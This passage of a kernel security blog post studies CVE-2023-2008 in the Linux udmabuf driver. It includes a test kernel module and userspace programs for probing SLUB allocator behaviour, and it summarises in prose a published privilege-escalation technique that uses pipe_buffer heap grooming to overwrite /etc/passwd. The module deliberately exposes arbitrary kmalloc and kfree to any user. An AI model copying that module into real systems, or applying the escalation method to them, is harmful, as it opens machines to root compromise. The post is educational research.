 __handle_mm_fault+0xdde/0x12c0
 handle_mm_fault+0xcb/0x210
 __do_page_fault+0x2a1/0x4d0
 do_page_fault+0x2c/0xe0
 page_fault+0x34/0x40

... SNIP ...

At this point, we can trigger a kernel bug through an OOB access. This bug generates a kernel Oops, which is a serious but non-fatal error in the Linux kernel. An oops may precede a kernel panic, but it may also allow continued operation with compromised reliability. However, as stated by the CVE description, we can go further and reach privilege scalation by exploring the OOB. Well, the driver tries to get a page after ubuf->pages. If we were able to create a struct page* and, somehow, put it right after the ubuf->pages, the driver would pick this page by the address and pass it to the kernel. After, the kernel would successfully map it to the mmap region and we would be able, from user space, to access a physical memory of our choice. This would give us a very powerful ability and lead to a privilege escalation, which is exactly what the exploit did.

As we have already seen, the ubuf->pages array is allocated using the function kmalloc. This function is one interface to allocate memory on the kernel heap. Even though it’s not trivial, we can apply the same concept we showed in our user-space example in the kernel heap. We need to manipulate the layout of the heap from user space, to make the kernel allocate what we want, where we want. To achieve this, we need to understand how the kernel heap allocator works. The current versions of the Linux kernel use the SLUB allocator as the heap manager. This leads us to our next study topic.

The SLUB allocator

When we started studying the Linux kernel heap allocator, we felt some difficulty in understanding the meaning of the following key terms: slab (lowercase), SLAB (uppercase), SLOB, and SLUB. Then, we will use Lexfo’s security blog explanation as a starting point:

The Linux kernel offers three different Slab allocators (only one is used): SLAB allocator: the historical allocator, focused on hardware cache optimization (Debian still uses it). SLUB allocator: the “new” standard allocator since 2007 (used by Ubuntu/CentOS/Android). SLOB allocator: designed for embedded systems with very little memory. NOTE: We will use the following naming convention: Slab is “a” Slab allocator (be it SLAB, SLUB, SLOB). The SLAB (capital) is one of the three allocators. While a slab (lowercase) is an object used by Slab allocators.

This article focuses on the SLUB allocator. There are very well-explained articles about all Slab allocators, so we don’t feel the necessity to explain how they work. Our main objective in this section is to give a practical approach with several test cases and examples. For now, we will assume that the concepts presented in the first part of the ORACLE blog are clear for the readers, as it explains the most important SLUB design principles and provides us with the needed knowledge to start the practical study.

Since we want to perform different tests, we have implemented a kernel module that allows user-space applications to allocate and free memory on the kernel heap through ioctl syscall, giving us more flexibility. Then, we created a user-space program that calls our ioctl. Both codes are listed below.

Kernel module:

#include <linux/mm.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/syscalls.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/fcntl.h>
#include <linux/unistd.h>
#include <asm/uaccess.h>
#include <linux/mm_types.h>
#include <linux/miscdevice.h>

MODULE_LICENSE("GPL");


struct james_param {
	uint32_t size;
	uint64_t addr;
};

#define JAMES_ALLOC _IOWR('j', 0x1000, struct james_param)
#define JAMES_FREE _IOW('j', 0x1001, struct james_param)

static uint64_t james_alloc(uint64_t arg)
{
	static int james_count = 0;
	struct james_param jalloc;
	if (copy_from_user(&jalloc, (void __user *)arg, sizeof(jalloc)))
		return 0;
	printk ("call %d\n", ++james_count);
	uint64_t ret = kmalloc(jalloc.size, GFP_KERNEL);
	jalloc.addr = ret;
	if (copy_to_user((void __user *)arg, &jalloc, sizeof(jalloc)))
		return 0;

	return ret;
}

static uint64_t james_free(uint64_t arg)
{
	struct james_param jfree;
	if (copy_from_user(&jfree, (void __user *)arg,
			   sizeof(jfree)))
		return 0;
	kfree(jfree.addr);
	return 1;
}

static long james_ioctl(struct file *filp, unsigned int ioctl, unsigned long arg)
{
	uint64_t ret;

	switch (ioctl) {
	case JAMES_ALLOC:
		ret = james_alloc(arg);
		break;
	case JAMES_FREE:
		ret = james_free(arg);
		break;
	default:
		ret = 0;
		break;
	}
	return ret;
}

static const struct file_operations james_fops = {
	.owner		= THIS_MODULE,
	.unlocked_ioctl = james_ioctl,
};

static struct miscdevice james_misc = {
	.minor          = MISC_DYNAMIC_MINOR,
	.name           = "james",
	.fops           = &james_fops,
	.mode           = 0666,
};

static int __init james_init(void)
{
	misc_register(&james_misc);
	return 0;
}

static void __exit james_exit(void)
{
	misc_deregister(&james_misc);
	return;
}

module_init(james_init);
module_exit(james_exit);

Userspace:

#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/ioctl.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>

struct james_param {
        uint32_t size;
        uint64_t addr;
};

#define JAMES_ALLOC _IOWR('j', 0x1000, struct james_param)
#define JAMES_FREE _IOW('j', 0x1001, struct james_param)

#define N_ALLOC 500

int main()
{
        cpu_set_t  mask;
        CPU_ZERO(&mask);
        CPU_SET(0, &mask);
        int result = sched_setaffinity(0, sizeof(mask), &mask);

        int fd = open("/dev/james", O_RDWR);
        struct james_param buffs[N_ALLOC];

        for (int i = 0 ; i < N_ALLOC ; i++) {
                buffs[i].size = 1024;

                ioctl(fd, JAMES_ALLOC, &buffs[i]);

                if (buffs[i].addr == 0) {
                        printf("ALLOC ERROR\n");
                        return 1;
                }

                printf("buffs[%d].addr: %llx\n",i , buffs[i].addr);

        }


        for (int i = 0 ; i < N_ALLOC ; i++) {
                ioctl(fd, JAMES_FREE, &buffs[i]);
        }

        close(fd);
        return 0;
}

For our first test, we will perform 500 kmallocs of size 1024, forcing the kernel to use the kmalloc-1024 cache. To allow us to deeply understand what happens during the allocation, we added prints inside the mm/slub.c file at the following functions:

entry of slab_alloc and __kmalloc;
slab_alloc_node to identify the intention to execute FAST PATH;
__slab_alloc to identify the intention to execute SLOW PATH 1, SLOW PATH 2, and SLOW PATH 3;
new_slap_object to identify the intention to execute SLOW PATH 4.

We will split the dmesg output and analyze each part separately.

... SNIP ...
[  335.630319] call 1
[  335.630321] __kmalloc(size: 1024, flags: 3264)
[  335.630321] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[  335.630322] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[  335.630323] FAST PATH
[  335.630323] FAST PATH EXIT
[  335.630324] slab_alloc_node(EXIT)
[  335.630324] slab_alloc(EXIT)
[  335.630324] __kmalloc(EXIT)
... SNIP ...
[  335.630409] call 11
[  335.630410] __kmalloc(size: 1024, flags: 3264)
[  335.630410] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[  335.630411] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[  335.630411] FAST PATH
[  335.630412] FAST PATH EXIT
[  335.630412] slab_alloc_node(EXIT)
[  335.630412] slab_alloc(EXIT)
[  335.630413] __kmalloc(EXIT)
... SNIP ...

We can see that, in the first allocations, the kernel reaches the FAST PATH, which allocates the requested memory from the lockless freelist.

... SNIP ...
[  335.630421] call 12
[  335.630422] __kmalloc(size: 1024, flags: 3264)
[  335.630422] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[  335.630423] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[  335.630423] SLOW PATH GENERAL: 1, 0, 0
[  335.630424] SLOW PATH 1
[  335.630424] SLOW PATH 1 EXIT
[  335.630425] slab_alloc_node(EXIT)
[  335.630425] slab_alloc(EXIT)
[  335.630426] __kmalloc(EXIT)
... SNIP ...

At 12 allocations, we started reaching the first slow path, which will get the allocated memory from the regular (lock) freelist, and set it to be the lockless freelist. The number of allocations in the lockless freelist depends on the previous state of the kernel, so 12 is not a default number and will change depending on previous allocations.

[  335.630506] call 19
[  335.630506] __kmalloc(size: 1024, flags: 3264)
[  335.630507] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[  335.630507] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[  335.630508] SLOW PATH GENERAL: 1, 0, 0
[  335.630508] SLOW PATH 2
[  335.630509] SLOW PATH 1
[  335.630510] SLOW PATH 1 EXIT
[  335.630510] slab_alloc_node(EXIT)
[  335.630511] slab_alloc(EXIT)
[  335.630511] __kmalloc(EXIT)

We will drop in the FAST PATH six more times and, at allocation number 19, we will reach the SLOW PATH 2. It happens because now, both lockless freelist and regular freelist have no available objects, so we need to take a partial slab from kmem_cache_cpu and make it the lockless freelist.

We will be inside this loop (FAST PATH -> SLOW PATH 2 -> FAST PATH …) for a while until there are no more partial slabs on the kmem_cache_cpu. After that, the kernel looks for partial slabs on the kmem_cache_node (which is the SLOW PATH 3), but in our test, the kernel didn’t have any Numa partial slabs. This means that we drop directly to the SLOW PATH 4:

... SNIP ...
[  335.631166] call 74
[  335.631166] __kmalloc(size: 1024, flags: 3264)
[  335.631167] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[  335.631167] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[  335.631168] SLOW PATH GENERAL: 1, 0, 0
[  335.631168] SLOW PATH 3
[  335.631169] SLOW PATH 4
[  335.631175] SLOW PATH 4 EXIT
[  335.631176] SLOW PATH 1
[  335.631176] SLOW PATH 1 EXIT
[  335.631177] slab_alloc_node(EXIT)
[  335.631177] slab_alloc(EXIT)
[  335.631178] __kmalloc(EXIT)

At allocation number 74, there aren’t any slabs with free objects, so the SLUB needs to ask the kernel for a new one. The fresh slab will be set as the active slab and all its objects will be listed in the lockless freelist. In our Ubuntu version, each slab in the kmalloc-1024 cache is backed by a compound page that contains 32 objects, which means that, after allocation number 74, the lockless freelist will contain 31 objects (32 - the one we just got). We can check the slab size in the /proc/slabinfo:

# cat /proc/slabinfo
... SNIP ...
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
kmalloc-1k          1599   1600   1024   32    8 : tunables    0    0    0 : slabdata     50     50      0
... SNIP ...

Since we have 31 objects in the lockless freelist and we are at allocation number 74, we can expect that a slow path will be reached only at allocation number 106. This is exactly what happens:

... SNIP ...
[  335.631553] call 106
[  335.631554] __kmalloc(size: 1024, flags: 3264)
[  335.631555] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffc067d092)
[  335.631555] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffc067d092)
[  335.631556] SLOW PATH GENERAL: 1, 0, 0
[  335.631556] SLOW PATH 3
[  335.631557] SLOW PATH 4
[  335.631562] SLOW PATH 4 EXIT
[  335.631562] SLOW PATH 1
[  335.631563] SLOW PATH 1 EXIT
[  335.631563] slab_alloc_node(EXIT)
[  335.631564] slab_alloc(EXIT)
[  335.631564] __kmalloc(EXIT)
... SNIP ...

Now, it is reasonable to think that we would stay in this loop (31x FAST PATH -> SLOW PATH 4 -> 31x FAST PATH) until we reach the last allocation. We do stay in this loop until allocation number 266, but the next SLOW PATH 4 appears at allocation number 295, before the expected 298. This is a demonstration that we are not the only ones to allocate objects from kmalloc-1024 cache. Any other process (or even an internal procedure of our process) can operate on this cache, so it’s impossible to have total control of one cache. One piece of information that can confirm that other execution flow is allocating objects from this cache is the addr value of slab_alloc and slab_alloc_node:

... SNIP ...
[  335.633668] slab_alloc(s->name: kmalloc-1k, gfpflags: 3264, addr: ffffffffb2912084)
[  335.633669] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 3264, node: -1, addr: ffffffffb2912084)
[  335.633669] FAST PATH
[  335.633669] FAST PATH EXIT
[  335.633669] slab_alloc_node(EXIT)
... SNIP ...
[  335.633835] __kmalloc(size: 544, flags: 2592)
[  335.633836] slab_alloc(s->name: kmalloc-1k, gfpflags: 2592, addr: ffffffffb2e899ee)
[  335.633836] slab_alloc_node(s->name: kmalloc-1k, gfpflags: 2592, node: -1, addr: ffffffffb2e899ee)
[  335.633837] FAST PATH
[  335.633837] FAST PATH EXIT
[  335.633837] slab_alloc_node(EXIT)
[  335.633838] slab_alloc(EXIT)
[  335.633838] __kmalloc(EXIT)
... SNIP ...

addr is the return address passed through RET_IP macro. Then, a different addr means that slab_alloc was called by a different function, then, a different path was taken. At our kmalloc calls, we always get the addr equal to 0xffffffffc067d092, differently from the cases above. An interesting point is that in the first snip above, slab_alloc was not called by kmalloc function. We found out that this allocation is made by printk. Since we print information in the middle of the allocation flow, the printk allocations appear like concurrent calls and the log gets a little messy at those points. To make sure, we changed all printk calls by trace_printk and these allocations didn’t happen. We can also see that in the second snip above, the kmalloc was called requesting an object of size 544 bytes, and the SLUB chose the kmalloc-1024 to satisfy this request because it is the smallest cache that can hold 544 bytes.

After all this journey, we ended up with 500 kmallok-1024 addresses that came out from multiple places, lockless freelist, regular freelist, partial slab, and a whole new slab. One thing that we expect is that if we are getting objects from a newly created slab, we will get consecutive addresses. Let’s take a look at the addresses we got. The following chart shows the difference between the addresses returned on two consecutive kmalloc calls:

Chart

If we were right, the differences should be mostly 1024 bytes. Of course, until we start getting new slabs from the SLOW PATH 4, the addresses will come from different memory locations. However, on our test, we started to get new slabs at allocation number 74, so at least the remaining 426 returned addresses should be sequential.

Even though the address differences are very weird, we have learned that all of them belong to the same cache. So what is happening? Let’s try to sort them and check the distribution:

Chart Sort

Now things make more sense. The differences are mostly 1024. The other differences can be attributed to the first allocations that land on partial slabs, or the last allocation on a slab and the first allocation on a new one.

This happens because the objects are somewhat randomized by a kernel obfuscation technique. This randomization only occurs if the flags CONFIG_SLAB_FREELIST_RANDOM and CONFIG_SLAB_FREELIST_HARDENED are set at compile time. Let’s compile the kernel without these flags perform the same test and analyze the distribution:

Chart no random

As we can see, most of the returned addresses are in order, making the SLUB behavior more predictable. In the real world, most Linux distributions enable those two flags, so we need to deal with them when developing an exploit.

Another mechanism that is important to us is the free operation. As shown by the ORACLE post, when an object is freed, it goes to the head of the lockless freelist (if it is freed by the same CPU that allocated the object). Then, we can imagine that if we free an object, it will be the one returned on the next kmalloc. Let’s perform another test to verify this behavior. We will modify our user-space program as the following:

#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/ioctl.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>

struct james_param {
        uint32_t size;
        uint64_t addr;
};

#define JAMES_ALLOC _IOWR('j', 0x1000, struct james_param)
#define JAMES_FREE _IOW('j', 0x1001, struct james_param)

int main()
{
        cpu_set_t  mask;
        CPU_ZERO(&mask);
        CPU_SET(0, &mask);
        int result = sched_setaffinity(0, sizeof(mask), &mask);

        int fd = open("/dev/james", O_RDWR);

        struct james_param buff;
        buff.size = 1024;

        ioctl (fd, JAMES_ALLOC, &buff);
        printf ("addr: %llx\n", buff.addr);
        // addr: ffff9f92c5c1d000


        ioctl(fd, JAMES_FREE, &buff);

        memset (&buff, 0, sizeof(struct james_param));
        buff.size = 1024;

        ioctl (fd, JAMES_ALLOC, &buff);
        printf ("addr: %llx\n", buff.addr);
        // addr: ffff9f92c5c1d000

        
        ioctl(fd, JAMES_FREE, &buff);

        close(fd);
        return 0;
}

It worked as imagined, however, we need to keep in mind that this can not happen if other operations are performed on the cache we are dealing with.

At this point, we have learned all the Linux concepts we need to develop an exploit for our vulnerability.

Exploit implementation

As we said earlier, the exploit for this vulnerability was developed by the BlueFrostSecurity labs. We also mentioned that they present a write-up of it on their blog. In the write-up, they carefully discuss all the design decisions that were taken to develop the exploit, so we feel no necessity to discuss it here. For the sake of completeness, we will present a summary of how the exploit reaches privilege escalation.

The array that is vulnerable to OOB accesses is the array of pages that backs a udmabuf. It means that if we could map the data page of /etc/passwd right after the udmabuf, we could modify this file and reach privilege escalation. BlueFrostSecurity researchers achieved it using pipes. They found out that the struct pipe_buffer is allocated using the same slab cache as the array of pages of udmabufs, and the first member of the struct pipe_buffer is the struct page it refers to, so the pointer to the struct pipe_buffer is also a pointer to the struct page inside it. To overcome the freelist randomization, the researchers perform a heap feng-shui, in a manner that they allocated several struct pipe_buffers in sequence, and after, create holes between them to force the next allocation (that will be the array of pages of udmabuf) to be allocated using one of these holes. If it succeeds, the struct pipe_buffer containing the struct page that holds the data of /etc/passwd will be located after (and before) the array of pages. Then, an OOB access can modify it.

Conclusion

In this post, we have shown that studying a kernel vulnerability provides good guidance for learning how Linux implements its internal mechanisms. Through CVE-2023-2008, we were able to understand how both udmabuf driver and SLUB allocator work, as well as several kernel structures, system calls and execution flows. We hope that you got a little more comfortable when reading the Linux kernel source code and that it helps you in your future studies!

References

CVE-2023-2008 patch
CVE-2023-2008
CWE-125
CWE-787
Exploit implementation
Heap feng shui
Lexfo CVE-2017-11176
Lexfo CVE-2017-11176
Pipe Buffers exploitation
SLUB allocator
Writeup
address-space
call_mmap
dma-buf
dma
do_mmap
do_mmap_pgoff
fcntl
fork
ioctl-new-way
ioctl
kernel Oops
ksys_mmap_pgoff
malloc internals
memfd_create(2)
mmap
mmap_region
sys_mmap
udmabuf
unp-book
vm_area
vm_mmap_pgoff

James-Sec

James-Sec collection of projects and blogs.